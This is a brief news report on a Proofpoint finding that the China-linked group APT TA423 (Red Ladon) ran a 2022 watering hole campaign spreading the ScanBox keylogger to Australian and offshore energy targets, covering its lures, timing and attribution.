Researchers have discovered that a China-based threat actor referred to as APT TA423 has ramped up its efforts to distribute the ScanBox reconnaissance framework to victims. Security researchers identified a watering hole attack that was likely conducted by the malicious hacking group against domestic Australian organizations and offshore energy firms in the South China Sea. The hacking group uses targeted messages linking back to illegitimate Australian news websites to lure its victims into clicking on malicious links. The campaign is believed to have been launched in April 2022 and lasted until at least mid-June. Security researchers on the Threat Research Team at Proofpoint have released a report detailing the campaign.
APT TA423 is also referred to by security researchers as Red Ladon. In the report, Proofpoint assesses the recent activity with high confidence that it is attributable to this group. The group likely operates out of Hainan Island in China. The APT made the news last year when the US Department of Justice indicted the group for providing long-standing support to the Hainan Province Ministry of State Security. This entity is believed to be responsible for cyber espionage, political security, foriegn intelligence, and counterintelligence efforts by China. The full effects of the keylogger campaign are not entirely clear, however, the group has been successful in stealing valuable information and trade secrets from targets including the US in the past.
Read More: Watering Hole Attacks Push ScanBox Keylogger
